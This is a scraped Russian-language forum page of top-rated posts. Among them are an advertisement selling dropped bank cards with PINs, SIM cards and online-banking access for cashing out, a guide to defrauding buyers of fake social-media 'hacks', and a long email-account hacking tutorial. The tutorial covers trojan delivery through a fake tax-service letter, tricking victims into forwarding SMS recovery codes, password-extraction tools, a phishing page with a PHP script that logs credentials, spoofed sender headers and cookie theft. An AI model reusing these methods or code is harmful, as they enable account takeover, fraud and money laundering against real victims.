Перейти к публикации

Таблица лидеров


Популярные публикации

Отображаются публикации с наибольшей репутацией на 05.04.2022 в Сообщения

  1. 2 балла
  2. 1 балл
    Предлагаем Вашему вниманию сервис по продаже дебетовых карт банков РФ. Гарантия: 1)Гарантия на карты 45 дней. 2)Если использовать под белые темы карты прослужат до конца срока действия. Дропы ручные и выездные. 3)Готов работать через гаранта или после оплаты товара. Все карты укомплектованы и готовы к работе. Всегда в наличии карты банков ▪️Сбер 14к ▪️АЛЬФА 12к ▪️ВТБ 12к ▪️РОССЕЛЬХОЗБАНК 12к ▪️ЛОКО 12к ▪️МТС 7к ▪️РГС 12к ▪️Райффайзен 300 13к ▪️УРАЛСИБ 12к ▪️ЮНИК 12к ▪️ДОМ РФ 12к ▪️АКБАРС 12к ▪️ХОУМ 12к ▪️Росбанк 12к ▪️рнкб 12к ▪️Газпром 12к ▪️Тинькофф 20к ▪️псб 12к ▪️отп 12к ▪️Россия 12к Остальные банки по договоренности. Комплектация: 1. Анкета - договор (заявление) 2. Дебетовая карта 3. Пин - код (записанный или пин - конверт) 4. Сим - карта, привязанная к карте 5. Доступ в интернет банк 6. Кодовое слово (и/или цифровой код) Контакты: ЛС Телеграм @Dropsbankcard Google смотри сюда--->>>: продажа дебетовых карт в МО, продажа дебетовых карт, дебетовые карты, купить, дебетовую карту, пластик, купить пластик, обнал, обналичка, карты для обналичивания денег, дебетовая карта не дорого, купля-продажа дебетовых карт, услуги по продаже дебетовых карт, visa, master card, дебетовые карты на заказ МО, выгодные условия по покупке дебетовых карт, услуги по продаже готовых дебетовых карт, атм, АТМ дебетовые карты, купить vizagold,купить атм банковскую карту
  3. 1 балл
    Итак, доброго всем времени суток. Увидев что сейчас более менее мусолится тема с взломом страниц вк, я решил отдать немного доработанную схему. Ничего здесь сложного нет, затрат практически можно избежать, приятного чтения Нам потребуется более менее поддатливая аудитория, желательно телеграмм аккаунт, парочка хороших и красивых скриншотов взломов и довольных клиентов и-и-и... Приложение с гугл плея "взлом вк". Неожиданно, не правда ли? Но вот так и начнутся наши великие взломы ничего не подозревающих жертв. Как вы уже наверно поняли, мы просто будем разыгрывать доверчивого мамонта, который капая слюной от таинственности и жуткого телеграмма, в котором обитают лютые профессиональные взломщики, прибежит заказывать страничку своего друга, дабы раскрыть его грязные тайны. 1. Первый шаг не тривиальный, подбираем клиента, который прибежал в личку через нашу рекламу/группу/объявление (на что хватит фантазии), после чего игнорим его минут 5 и наконец снисходим до смертного и выдаем ему заранее напечатанное сообщение с прайсом и требованиями. Как понятно, страница должна быть открытой и айди должен четко пропечатываться на главной. 2. Радостный мамонт от осознания, что нашел взломщика за 500 рублей( у кого насколько жадности хватит) еще больше радуется, что никакой предоплаты вам не надо, и сама оплата происходит после взлома и предоставления пруфов. Вот теперь он точно уверен что вы Профессионал с большой буквы П и действительно хакните его дружка. Поэтому вы спокойно пишете ему сообщение о том, что его заказ принят в обработку и будет исполнен в течение дня(или сколько вы хотите его проморозить). Выбирайте срок с умом, ведь чем больше воздержание, тем желаннее результат, однако если перегнуть, то он остынет и сорвется. 3.Качаем приложение с гугл плея "Взлом вк", после чего закономерно открываем его. Там даже вполне годный интерфейс 4. Вводим соответствующий айди, который получается путем проследования на страницу жертвы. 5. Просто получаем какой-то рандомный набор последних переписок этого человека. Если вам не нравится, просто сбросьте и заново введите айди. 6. Ну вот и все, по итогу, мы достаточно проморозили мамонта до состояния капания слюной на клавиатуру, поэтому скидываем ему красивую картинку пруфа и принимаем заветные денежки. В итоге, я скажу вам так, может мне сильно повезло с клиентами, но у меня скинули деньги 9/10 людей, но это я готовил скрины фейковых переписок и пруфов, заморочился телеграмм каналом с накрученной подписотой, а также занес за рекламу некоторым школоканалам. Думаю, оценить возможный выхлоп при более тщательной подготовке вы в состоянии сами, схему наверно может даже впихнуть кому-то за несколько рублей можно будет на соседнем борде, поэтому я просто пожелаю вам успеха и удачи. Не ленитесь, и даже с такой незамысловатой схемой вы сможете заработать себе на оплату коммуналок и сытный ужин
  4. 1 балл
    Нейромаркетинг — направление на стыке маркетинговых исследований и нейрофизиологии, когда реакцию покупателей на рекламные материалы исследуют по активности мозга и другим физиологическим параметрам. Востребованность и популярность нейромаркетинга обусловлена в первую очередь ограниченностью «традиционного» маркетинга и надеждами на то, что наука сможет эти ограничения преодолеть. Действительно, наука помогала маркетологам неоднократно; в частности, именно научными методами удалось выяснить, как люди принимают решение о покупке: рационально или эмоционально. В 1978 Герберт Саймон получил Нобелевскую премию за теорию ограниченной рациональности – он пришел к выводу, что мозг принимает решения по-разному в зависимости от загруженности и важности решения. Например, над покупкой автомобиля человек будет думать обстоятельно, а вот кофе на завтрак выберет импульсивно, поскольку это не настолько важно. Еще дальше удалось продвинуться нобелевскому лауреату Даниелу Канеману и его коллеге Амосу Тверски. Они выяснили, что в мозге есть две системы принятия решений: эмоциональная и рациональная; одна быстрая, другая медленная. Оказалось, что принятие решения происходит в мозге задолго (то есть за 400–700 миллисекунд) до того, как мы его осознаем. Таким образом, роль сознания сводится только к тому, чтобы принять, отклонить или обдумать некий готовый план действий. Основной фокус внимания нейромаркетинга лежит в области эмоциональных и неосознанных реакций на маркетинговые материалы. Для этого используются электроэнцефалография (ЭЭГ), ай-трекер (eye-tracker, то есть устройство, отслеживающее движения глаз), полиграф, камера высокого разрешения. ЭЭГ позволяет по электрической активности мозга оценить силу и направление эмоций, степень внимания и возбуждения в каждый момент времени. Ай-трекер помогает понять, на каких рекламных образах человек задерживает свое внимание. Полиграф с помощью кожно-гальванических датчиков, пульсометра и сенсоров дыхания определяет силу эмоций и реакцию наиболее «древних» вегетативных структур мозга, также связанных с эмоциями. А камера высокого разрешения дает возможность рассмотреть микромимику подопытного. Впрочем, у нейромаркетинговых исследований тоже есть ряд ограничений. Они выявляют реакцию человека на товар, но не причину того, почему мы все-таки совершили или не совершили покупку. Также не стоит сбрасывать со счета риск не совсем верной экстраполяции результатов: подобные исследования стоят недешево, и потому их проводят только с небольшими группами участников. Кроме того, могут возникать неточности в оценке рациональных и эмоциональных процессов. ЭЭГ снимают с кожи головы, а так как полушария, занятые сознательными, «разумными» процессами, находятся ближе всего к коже, то как только подопытный серьезно задумывается, становится трудно получить сигнал от глубинных «эмоциональных» структур мозга – мешают интенсивные сигналы от коры. Выход нейромаркетинга на массовые рынки и стремительная экспансия началась в 2008 году, когда крупнейший мировой игрок на рынке маркетинговых исследований Nielsen купил долю в NeuroFocus, компании-лидере нейромаркетинговых исследований. К 2011 году Nielsen завершил покупку компании и превратил ее в свое штатное подразделение. На текущий момент компания является лидером рынка и располагает лабораториями в США, Великобритании, Германии, России, Бразилии, Мексике, Колумбии, Японии, Китае и Индии. Главное направление, которым сейчас занимаются нейромаркетологи, — это тестирование рекламы. Исследования помогают брендам оценить эффективность того или иного рекламного подхода, его попадание в запросы целевой аудитории, и дают рекомендации, как найти такой образ, который легче всего донести до потребителей. В России крупные компании пока только присматриваются к этому направлению, однако ситуация может измениться уже в ближайшее будущее. Организаторы конкурса Tech in Media отмечают, что тема нейромаркетинга с годами все чаще интересует СМИ, а значит, запрос на внедрение нейромаркетинга есть уже сейчас.
  5. 1 балл
    Что нужно сделать в связи с недавним взломом Facebook: Ничего. Чего не нужно делать в связи с недавним взломом Facebook: Не торопитесь менять пароль. Этот взлом не затронул пароли, они в целости и сохранности. Не паникуйте. Даже если вы обнаружили, что по какой-либо причине вас выкинуло из вашей учетной записи Facebook. Это означает, что, по мнению Facebook, инцидент коснулся вашей учетной записи, и компания сбросила токен авторизации пользователя, чтобы никто кроме вас не мог получить к ней доступ. Так что, если до сих пор ничего плохого не произошло, то сейчас ваша учетная запись в полной безопасности. Вам потребуется заново выполнить вход, введя свой пароль и код 2FA (если вы активировали эту функцию ранее), — и все. Не спешите удалять свою учетную запись в Facebook. Конечно, вы всегда можете это сделать, однако данный инцидент — не повод для слишком сильного беспокойства. Что же, собственно, произошло 28 сентября сеть Facebook опубликовала уведомление о том, что технические специалисты компании обнаружили проблему безопасности, которая затронула почти 50 миллионов учетных записей. «Проблема безопасности» означает, что кто-то провел довольно сложную атаку, которая позволила похитить 50 миллионов токенов авторизации (их еще называют маркерами доступа) пользователей. Маркер доступа, по определению самой сети Facebook, фактически представляет собой ключ к вашей учетной записи. Если у пользователя есть маркер доступа, то Facebook считает, что он авторизован в системе и имеет право входить в учетную запись. Соответственно, Facebook при этом не просит ввести логин, пароль и код 2FA. Таким образом, располагая 50 000 000 похищенных маркеров доступа пользователей, злоумышленники потенциально могли получить доступ к 50 000 000 соответствующих этим маркерам учетных записей. Однако это не значит, что они получили доступ к вашим паролям или каким-то образом изменили механизм двухфакторной аутентификации. Ваш пароль не был скомпрометирован, а система 2FA продолжает работать, как должна. Однако кража маркера позволяет обойти эти меры защиты. Facebook объясняет, что расследование инцидента еще только началось, и пока что в компании подозревают, что кто-то обнаружил уязвимость в функции просмотра страницы от лица другого пользователя (функция «Посмотреть как»), и использовал ее для получения доступа к 50 миллионам маркеров учетных записей. Именно поэтому Facebook отключила данную функцию, сбросила маркеры проверки подлинности пользователя для этих учетных записей, а также выполняет сброс таких маркеров еще для 40 миллионов пользователей, которые использовали функцию «Посмотреть как» на протяжении последнего года. Последняя мера – это скорее перестраховка, однако в сложившейся ситуации для Facebook любая мера безопасности будет не лишней. Если маркер был сброшен, это означает, что человек, к которому он относился, больше не сможет использовать его для доступа к соответствующей учетной записи и должен выполнить вход заново. У злоумышленников нет вашего логина или пароля, так что после сброса они не смогут выдавать себя за вас (даже если вы оказались в числе пострадавших пользователей). Facebook обещает обновить свой пост, как только станет ясно, что именно случилось и имело ли место реальное злоупотребление доступом к какой-либо из пострадавших учетных записей. Ну а пока мы предлагаем ограничиться теми мерами, которые описали в начале статьи: ничего не делать. Действительно, сейчас вы не можете сделать ничего конструктивного по этому поводу, так что не паникуйте. Когда ситуация прояснится, мы подготовим более подробные инструкции, если окажется, что действительно стоит что-то предпринимать.
  6. 1 балл
    Ничего не понял )
  7. 1 балл
  8. 1 балл
    Блээээт как же я ненавижу рекппчу. Выберите автобусы. Выберите знаки. Посмотрите еще картинки. СУка блядь для чего я полдня тыкаю в эти картинки, разве ради доступа в Форт Нокс?
  9. 1 балл
    написал в лс,интересует залив и условия.
  10. 1 балл
    Занимаюсь этой темой уже достаточно давно, работаю по мск если кто не помнит , хотелось бы еще раз поблагодарить тебя Степан , ты в корне изменил мою жизнь
  11. 1 балл
    это нормальная практика , блевать после матраса 3гнд
  12. 1 балл
  13. 1 балл
    каким образом данный вопрос считается приемлимо задавать в этой теме ?
  14. 1 балл
  15. 1 балл
    Способ 1: используем троян Довольно распространенным способом заполучения доступа к чужому ящику является рассылка электронных писем со встроенными вирусами. Точнее вирус встраивается не в само письмо, а письмо лишь содержит ссылку на вирус. Обычно содержание письма должно чем-то «зацепить» пользователя. Оно должно быть таким, на которое пользователь не сможет не отреагировать. Примеры троянов — DarkComet RAT, SpyEye, Carberp. О DarkComet RAT мы уже писали, о Carberp было написано на Хабре. А SpyEye — это наш отечественный троян, разработанный Александром Паниным, который даже засветился в сводках ФБР. Мы использовали модифицированную версию трояна ZeuS. На момент создания (29.10.15) нашу версию не обнаруживал ни один антивирус (рис. 1), к тому же в нем была функция отключения процессов, среди которых есть Dr.Web. Однако на компьютере жертвы был установлен Comodo — так даже лучше. В качестве жертвы мы выбрали бухгалтера нашей управляющей компании Юлию. Ради чистоты эксперимента она ничего не подозревала о том, что мы собираемся сделать. Думаю, об этом не стоило даже и говорить. Итак, у нас есть модифицированный ZeuS, но как заставить Юлию запустить его? Если просто отправить ей ссылку, понятно дело, она переходить по ней не будет. Обещать золотые горы в письме — тоже прошлый век, на такое пользователи уже не реагируют. Рис. 1. Отчет VirusTotal Тогда мы решили отправить письмо якобы от имени Федеральной Налоговой службы (рис. 2). Мы выбрали то, что «зацепит» жертву. Рис. 2. Письмо от налоговой Чтобы поле From содержало внушительное название, а не xaker134566788@mail.ru, нами были подделаны заголовки письма. Это делается довольно просто, а как именно будет показано в способе 5. Пока не будем на это отвлекаться. Как мы и рассчитывали, Юлия скачала программу и запустила инсталлятор обновления формы отчетности (рис. 3). Инсталлятор сделан с помощью Inno Setup за 5 минут. Именно он установит и запустит наш троян. Рис. 3. Установка трояна После этого мы можем полностью контролировать компьютер жертвы (рис. 4). Что мы можем? Мы можем ради интереса просмотреть список процессов компьютера, в котором, ясное дело, не будет нашего трояна (рис. 5). Мы можем просмотреть файловую систему (рис. 6). Рис. 5. Список процессов на компьютере жертвы Рис. 6. Файловая система на компьютере жертвы Конечно, самое главное, ради чего все это затевалось — список паролей, сохраненных в браузере (рис. 7). Рис. 7. А вот и пароли Письмо и инсталлятор далеки от идеала, поскольку все делалось на скорую руку. Однако наша затея увенчалась успехом. Для достижения своей цели мы объединили целых два способа — социальный инженеринг и «поддельное» письмо. Оба эти способа будут рассмотрены далее. Эффективность: средняя Сложность: средняя Стоимость: низкая Способ 2: взлом по номеру телефона Суть этого способа заключается в следующем. Злоумышленнику нужно знать номер телефона жертвы, указанный при регистрации почтового ящика. При сбросе пароля почтовая служба требует ввести последние символы номера телефона (или выбрать номер телефона из списка). На этот номер будет отправлено SMS с кодом подтверждения сброса пароля. Затем злоумышленник отправляет второе SMS с требованием указать код из предыдущего SMS. Пользователь, ничего не подозревая, отправляет код из первой SMS. Самый большой недостаток этого способа в том, что первая SMS придет от Google, а вторая — с неизвестного номера. Успех этого способа зависит от сообразительности жертвы. Посмотрим на этот способ на практике. Первым делом попытаемся просто сбросить пароль, после чего Google попросит ввести тот пароль, который мы помним. Понятное дело, пароль мы не помним, поэтому нажимаем кнопку Затрудняюсь ответить (рис. 8). Рис. 8. Запрос на восстановление пароля Далее если у вашей жертвы был привязан к аккаунту Android-телефон, то Google предложит отправить оповещение (рис. 9), которое выглядит, как показано на рис. 10. Примечательно, но смартфон не издал ни единого звука, а просто отобразил оповещение. Если он не будет перед глазами у пользователя, есть вероятность, что он его не заметит. Если же пользователь нажмет Нет, то не отчаивайтесь — повторите данный процесс несколько раз — позже поймете зачем. Рис. 9. Предложение отправить оповещение Рис. 10. Оповещение Google После нажатия кнопки Отправить оповещение откроется страница, изображенная на рис. 11. Перейдите по ссылке Сбросьте пароль другим способом. Откроется классическая страница сброса пароля через SMS-код (рис. 12). Эта же страница откроется, если к аккаунту не привязан Android-телефон. Рис. 11. Инструкция по работе с оповещением Рис. 12. Отправка SMS-кода Настал кульминационный момент. Жертва получает код подтверждения Google (рис. 13). Рис. 13. Код подтверждения Далее вы должны с другого телефона сразу же отправить примерно такое сообщение: Предотвращена попытка входа в аккаунт Google. Перешлите код подтверждения Google для разблокировки аккаунта. На рис. 14 показано, как выглядит это сообщение на экране телефона. Рис. 14. Сообщение от злоумышленника С одной стороны, пользователь может обратить внимание на неизвестный номер. С другой стороны, поставьте себя на место среднестатистического пользователя. Сначала он получает уведомление о сбросе пароля, потом SMS с кодом подтверждения, а после — сообщение о том, что замечена подозрительная активность. Конечно, можно все немного усложнить и завести короткий номер, с которого и будет отправлена SMS. Получить короткий номер с названием службы, например, Google Security, не проблема. Это только повысит вероятность успеха. В нашем случае все получилось и без короткого номера. Мы получили код активации, который потом был указан на странице восстановления пароля. Таким образом, нам получилось сбросить пароль аккаунта и заполучить доступ к почтовому ящику. Получение доступа к почтовому ящику — это еще не все. Чтобы жертва не догадалась, что ее ящик увели, после сброса пароля нужно создать временный пароль и отправить его по SMS, а самим тем временем сделать переадресацию на «хакерский» ящик. Так можно получить контроль над ящиком, не вызвав особых подозрений. Рис. 15. Настройка переадресации Эффективность: средняя Сложность: низкая Стоимость: низкая Способ 3: доступ к компьютеру Если у вас есть доступ к компьютеру жертвы, то можете считать, что почту вы уже взломали. Вы можете запустить на компьютере или кейлоггер или программу для «восстановления» паролей почтовых учетных записей. Суть кейлоггера в том, что в специальный файл он записывает все, что пользователь вводит с клавиатуры. Вам останется только второй раз подойти к компьютеру, чтобы забрать результирующий файл (или получить его по почте). К преимуществам кейлоггера относится то, что он записывает все подряд. Поэтому кроме паролей можно получить еще много интересной информации о своей жертве. Но и недостатков у них очень много. Самый существенный — большинство кейлоггеров успешно определяются антивирусами и если на компьютере жертвы установлен антивирус, использовать кейлоггер не получится. Ведь не всегда есть возможность отключить антивирус. Второй недостаток вытекает из его достоинства. В результирующий файл помещается много лишней информации. Мало собрать информацию с клавиатуры, нужно еще отыскать среди всего лишнего то, что нужно — пароль. Третий недостаток — если жертва использует почтовый клиент, а не веб-интерфейс, то кейлоггер вообще не поможет. Скорее всего, пароль уже введен в почтовый клиент и запомнен, поэтому жертва не вводит его каждый раз при проверке почты. Следовательно, кейлоггер запишет в файл все, что вводит пользователь, кроме того, что нужно вам. Есть и еще один недостаток — если выбранный кейлоггер не поддерживает отправку результирующего файла по e-mail, то придется еще один раз подходить к компьютеру. Пример кейлоггера — SniperSpy — на случай, если вы захотите ним воспользоваться. Программы для «восстановления» паролей почтовых учетных записей позволяют сразу получить все интересующие вас пароли без необходимости чтения мегабайтов текста в поиске нужного вам пароля. К тому же на них никак не реагирует антивирус. Одна из таких программ — это Mail PassView. Она позволяет восстановить пароли следующих почтовых учетных записей: Outlook Express Microsoft Outlook 2000 (POP3 and SMTP Accounts only) Microsoft Outlook 2002/2003/2007/2010/2013 (POP3, IMAP, HTTP and SMTP Accounts) Windows Mail IncrediMail Eudora Netscape 6.x/7.x Mozilla Thunderbird Group Mail Free Yahoo! Mail – если пароль сохранен в приложении Yahoo! Messenger. Hotmail/MSN mail – если пароль сохранен в приложении MSN Messenger. Gmail – если пароль сохранен в приложениях Gmail Notifier, Google Desktop или Google Talk. Программу мы проверили на своих компьютерах и заявляем: она работает (рис. 16). На рис. 16 пароли, как и адреса e-mail затерты по понятным причинам. Рис. 16. Программа Mail PassView Mail PassView — не единственная программа в своем роде. Существуют и другие программы: Outlook Password Decryptor — позволяет восстановить пароли из Outlook, в том числе самых последних версий (Outlook 2015, работающей под управлением Windows 10); PstPassword — еще одна программа для восстановления паролей, сохраненных в Outlook; WebBrowserPassView — программа для восстановления паролей, хранящихся в браузере. Поддерживаются браузеры IE, Chrome, Opera, Safari, Firefox. Все, что нужно — это знать, какой почтовый клиент использует жертва. Найти программу для «восстановления» пароля из этого почтового клиента — не проблема. Если же жертва использует веб-интерфейс для чтения своего почтового ящика, тогда лучше использовать программу WebBrowserPassView. Она поддерживает все версии Windows, начиная с 2000 и заканчивая 10. Старые версии вроде 98/ME не поддерживаются. Мы протестировали и эту утилиту. Программа успешно восстановила все пароли, хранящиеся в браузерах IE, Firefox, Chrome и Opera (Safari нами не тестировался, но, считаем, что и там будет полный «порядок»), см. рис. 17. Даже если вы не найдете среди этого списка пароль от почтового ящика, сей список будет тоже полезен — ведь люди часто используют одни и те же пароли для разных служб. Рис. 17. Восстановленные пароли Для удобства программа позволяет сохранить выбранные пароли в текстовый файл, который потом можно неспешно изучить на своем компьютере. Раз мы уже заговорили о восстановлении паролей, то вам может пригодиться программа Dialupass, восстанавливающая dialup/RAS/VPN-пароли. Программа поддерживает Windows 2000, Windows XP, Windows 2003/2008, Windows Vista, Windows 7, Windows 8 и Windows 10 Эффективность: высокая Сложность: низкая Стоимость: низкая Способ 4: социальная инженерия Об этом способе не писал только ленивый. Много было уже сказано. Вам кажется, что этот способ не такой эффективный, как о нем говорят? Вы ошибаетесь. Совсем недавно была взломана почта директора ЦРУ Джона Бреннана. Абсурдность ситуации в том, что почту взломал не «матерый» хакер, а обычный подросток, правильно собрав информацию о своей «жертве». Подросток сначала связался с сотовым оператором, представившись сотрудником технической поддержки, уточнил детали аккаунта Бреннана. После этого он позволил в AOL и, представившись Бреннаном, попросил сбросить его пароль. Поскольку он знал всю необходимую информацию (номер почтового аккаунта, последние цифры банковской карты, 4-значный PIN-код, номер телефона), пароль был сброшен и никто ничего не заподозрил. Чуть позже Wikileaks опубликовал письма директора ЦРУ, см. рис. 18. Рис. 18. Письма директора ЦРУ, опубликованные Wikileaks Преимущество этого способа в том, что не нужно обладать никакими специальными знаниями и этот способ под силу любому. Успех этого метода зависит от смекалки «нападающего» — сможет ли он найти нужную информацию или нет. Эффективность: высокая Сложность: средняя Стоимость: низкая Способ 5: доверчивые пользователи (фишинг) Попросим пользователя самого сообщить нам свой пароль. Нет, этот способ не подразумевает физического насилия и ни один из пользователей в результате эксперимента не пострадает. Во всяком случае, физически. Суть этого метода в следующем: нужно создать фейк страницы авторизации того сервиса, который вы хотите взломать. Например, если вы хотите получить пароль от почты GMail.com, тогда нужно создать такую же страницу входа. Далее нужно заманить пользователя на фейковую страницу. Это можно сделать несколькими способами: Отправить ему сообщение якобы от имени администрации того сервиса. В сообщении указать, что-то вроде «Вы давно не заходили в свой почтовый ящик. Если вы не воспользуетесь ним до <Д>.<М>.<Г>, он будет удален.». Рисуем кнопочку Войти, нажав которую пользователь попадет на вашу страницу авторизации. Отправить сообщение со ссылкой, которая должна заинтересовать пользователя. Когда он перейдет по ней, он увидит сообщение о необходимости входа для просмотра содержимого. Сейчас многие сервисы позволяют войти с помощью учетной записи GMail или одной из социальных сетей. Так что пользователь может ничего и не заподозрить. Очень часто описывается только «общее направление». Мы же попробовали реализовать его в собственной компании и посмотреть на реакцию обычных пользователей. Способ довольно непростой и для его реализации понадобятся, как навыки программирования на PHP, так и некоторые финансовые вложения. Ведь нам понадобится хостинг с поддержкой PHP (для выполнения PHP-сценария и размещения формы авторизации) и доменное имя, «похожее» на имя взламываемого сервиса. Конечно, опытный пользователь сразу заметит подлог, но посмотрим, как отреагируют самые обычные пользователи. Итак, мы создали форму авторизации, похожую на форму входа в Google. Результат наших страданий изображен на рис. 19. Конечно, можно было бы и лучше, но мы спешили. Рис. 19. Форма входа Далее мы отправили некоторым сотрудникам сообщение о том, что их почтовый ящик будет заблокирован. Обратите внимание, что дизайн письма даже отдаленно (если не считать логотипа) не напоминает дизайн, используемый Google. Но, как показала практика, для наших пользователей этого было достаточно. Можно было бы взять исходный код письма, которое отправляет Google, сделать все более качественно. В реальных условиях злоумышленник так и сделает — будьте в этом уверены. Рис. 20. Письмо, которое мы отправили пользователям Что произошло дальше? Дальше пользователи прочитали письмо, перешли по ссылке и наивно ввели имя пользователя и пароль, которые были переданы сценарию. Сценарий принимает эти данные и записывает в текстовый файл. Написать такой сценарий сможет любой новичок, владеющий основами PHP. Примерный код сценария (это не тот сценарий, который использовали мы) приведен в листинге 1. Листинг 1. Простейший сценарий записи паролей Код: <?php // введенный логин $login = $_POST['Login']; // браузер пользователя $browser = getenv("HTTP_USER_AGENT"); // Пароль $pass = $_POST['password']; // Записываем полученные данные $text = "Login = $login\nPassword = $pass\nBrowser = $browser"; // открываем файл $filelog = fopen("log.txt","a+"); // записываем строку fwrite($filelog,"\n $text \n"); fclose($filelog); // закрываем // перенаправляем пользователю на страницу входа в google, чтобы // меньше было подозрений header('Location: https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/&ss=1&scc=1<mpl=default<mplcache=2&emr=1&osid=1#identifier '); ?> Результат работы нашего сценария приведен на рис. 21. Рис. 21. Результат работы сценария Еще раз отметим, что все делалось на скорую руку. А для отправки сообщения использовалась почта Yahoo!, чтобы не бороться с антиспамом. Но можно было бы пойти и по иному пути. Например, найти сервер SMTP со свободной отправкой писем (без авторизации). Как правило, это будет неправильно настроенный SMTP-сервер какой-то небольшой организации. Списки таких серверов регулярно обновляются на специальных ресурсах. Думаю, не составит особого труда найти такой список, например, этот. Далее можно развернуть на локальном компьютере веб-сервер с поддержкой PHP. Тогда у вас будет доступ к php.ini и можно будет указать SMTP-сервер, через который функция mail() будет отправлять письма. С другой стороны, можно попытаться отправить сообщение и через собственный хостинг (не обязательно устанавливать локальный веб-сервер). Все зависит от его настроек. Мы, например, для выполнения сценария отправки нашего сообщения использовали наш хостинг. На нем функция mail() выполнилась без особых нареканий. Понятно, что если просмотреть все заголовки письма, «след» приведет к нам. Но для нас сейчас это не важно. Сейчас важно, чтобы в почтовом клиенте поле «От» содержало то, что нам нужно. В первом способе мы поступили именно так, то есть для отправки сообщения использовали функцию mail(). Стандартная PHP-функция mail() позволяет с легкостью указать, как текст письма, так и его заголовки. Например: Код: $headers = 'From: Федеральная налоговая служба <no-reply@nalog.ru>' ."\r\n" . 'Reply-To: no-reply@nalog.ru' . "\r\n"; mail($to, $subject, $message, $headers); $headers = 'From: Google <no-reply@accounts.google.com>' ."\r\n" . 'Reply-To: no-reply@accounts.google.com' . "\r\n"; mail($to, $subject, $message, $headers); Письма, отправленные таким образом, миновали антиспам Google (не попали в папку Спам) и нормально отображались, как в почтовом клиенте (проверялось в Outlook и The Bat!), так и в веб-интерфейсе. Конечно, перед отправкой сообщения жертве лучше отправить его на свой ящик и убедиться, что письмо отображается правильно, как минимум, что почтовый клиент правильно определяет кодировку. Если это не так, в $headers нужно добавить заголовки, описывающие кодировку письма. Определенные результаты при использовании этого метода мы получили. Некоторые из пользователей оставили свои реальные пароли. Некоторые не отреагировали на это письмо и обратились к администратору. А некоторые догадались, в чем дело и вместо пароля ввели абракадабру. Столь посредственные результаты обусловлены тем, что мы не готовились особо и сделали и форму входа, и само письмо весьма некачественно. Но все же мы получили несколько реальных паролей, так что этот метод работает, не смотря на весь скептицизм. Эффективность: высокая Сложность: высокая Стоимость: высокая Способ 6: изучаем жертву и «вспоминаем» пароль Теперь попробуем вспомнить то, что никогда не знали — пароль от почтового ящика жертвы. Очень часто почтовые службы позволяют восстановить забытый вопрос. А чтобы убедиться, что пользователь, пытающийся восстановить доступ к ящику, является его владельцем, почтовая служба задает контрольный вопрос, указанный при регистрации почтового ящика (рис. 22). Если вы пытаетесь взломать ящик знакомого вам человека, то есть вероятность, что вы уже знаете ответ на этот вопрос. Если же вы взламываете пароль чужого человека, то первое, что нужно сделать — это заняться изучением жертвы. Рис. 22. Восстановление пароля на Яндексе Чем больше вы соберете информации о жертве, тем проще будет взломать почтовый ящик. Информацию можно собирать разными способами — можно втереться в доверие к самой жертве и выведать как бы случайно у него нужную вам информацию (например, девичью фамилию матери, см. рис. 22), а можно подружиться с друзьями жертвы. Благо, социальные сети позволяют быстро найти не только жертву, но и ее друзей. Эффективность: высокая Сложность: средняя Стоимость: низкая Способ 7: XSS-уязвимости Один из способов взлома электронной почты — это использование XSS-уязвимостей. Вот только вряд ли можно назвать его эффективным. Во-первых, все найденные XSS-уязвимости в популярных почтовых сервисах очень быстро устраняются. Во-вторых, учитывая «во-первых», искать XSS-уязвимость придется самому (ведь все найденные уязвимости уже закрыты). А на поиск потребуется определенное время. Да и реализация атаки через XSS-уязвимость требует повышенной квалификации. Как вариант, этот метод можно рассмотреть. Сугубо из академического интереса. Но если нужно побыстрее взломать почту, тот же социальный инженеринг окажется более эффективным. Если хочется посмотреть на взлом посредством XSS, можете ознакомиться вот с этой статьей. В ней описано, как увести чужие куки. Если развить тему, то можно подменить свои cookies на чужие и заполучить доступ к чужому ящику. Эффективность: низкая Сложность: высокая Стоимость: низкая Способ 8: кража Cookies Еще один неплохой способ получения доступа к почтовому ящику — это кража Cookies. Конечно, он эффективен, если жертва хранит свои пароли в браузере. Даже если вы не получите пароль к почтовому ящику, вы можете получить пароли к другим сервисам. Пользователи часто используют одни и те же пароли для доступа к разным сервисам. Поэтому если вы найдете пароль к одному сервису (например, к блогу, форуму), вы можете попытаться его использовать при входе в почтовый аккаунт. Есть вероятность, что он подойдет. Как украсть «куки»? Существуют различные способы — от использования трояна (см. рис. 23) до банального копирования на флешку или свой FTP, если вы оказались за компьютером жертвы. Под рукой нет приложения для получения паролей (см. способ 3)? Не беда! Можно просто скопировать каталог с Cookies и проанализировать на своем компьютере. Для анализа Cookies можно использовать самые разные утилиты, одна из которых CookieSpy, которая поддерживает не только установленные, но и portable-браузеры, что позволяет «подсунуть» программе каталог с Cookies (рис. 24) Рис. 23. Кража куков с помощью трояна Рис. 24. Анализ Cookies программой CookieSpy Эффективность: средняя Сложность: высокая Стоимость: низкая Способ 9: bruteforce Самый неэффективный способ. Он заключается в переборе пароля по списку. Программа просто пытается подобрать пароль методом «тыка» (он же метод Коши). Конечно, в идеальных условиях у нее это рано или поздно получится. Но практически все сервисы заблокируют почтовый ящик после 3-5 неудачных попыток. Поэтому вряд ли у вас получится использовать «метод грубой силы». Если вам таки хочется попытаться, тогда можете попробовать использовать утилиту Brutus, использование которой обсуждается на hackerthreads. Есть и еще одна довольно популярная утилита — THC-Hydra, позволяющая взломать самые различные сервисы: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, S7-300, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC и XMPP. Эффективность: низкая Сложность: средняя Стоимость: низкая Способ 10: обратиться к профессионалам
  16. 1 балл
